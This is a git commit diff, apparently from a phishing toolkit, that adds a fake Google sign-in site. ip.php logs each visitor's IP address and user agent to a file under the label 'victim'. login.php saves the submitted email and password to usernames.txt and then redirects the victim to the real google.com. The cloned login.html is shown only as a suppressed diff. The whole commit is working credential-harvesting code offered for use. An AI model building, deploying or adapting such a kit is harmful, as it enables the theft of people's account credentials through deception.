This commit is contained in:
The Linux Choice
2018-06-22 19:14:38 -03:00
committed by GitHub
parent 02eb50203f
commit 5bfb0d0786
63 changed files with 50230 additions and 0 deletions

5
sites/google/index.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
include 'ip.php';
header('Location: login.html');
exit
?>

29
sites/google/ip.php Normal file
View File

@@ -0,0 +1,29 @@
<?php
if (!empty($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
}
else
{
$ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
}
$useragent = " User-Agent: ";
$browser = $_SERVER['HTTP_USER_AGENT'];
$file = 'ip.txt';
$victim = "IP: ";
$fp = fopen($file, 'a');
fwrite($fp, $victim);
fwrite($fp, $ipaddress);
fwrite($fp, $useragent);
fwrite($fp, $browser);
fclose($fp);

2080
sites/google/login.html Normal file

File diff suppressed because one or more lines are too long

5
sites/google/login.php Normal file
View File

@@ -0,0 +1,5 @@
<?php
file_put_contents("usernames.txt", "Account: " . $_POST['Email'] . "Pass: " . $_POST['Passwd'] . "\n", FILE_APPEND);
header('Location: https://google.com/');
exit();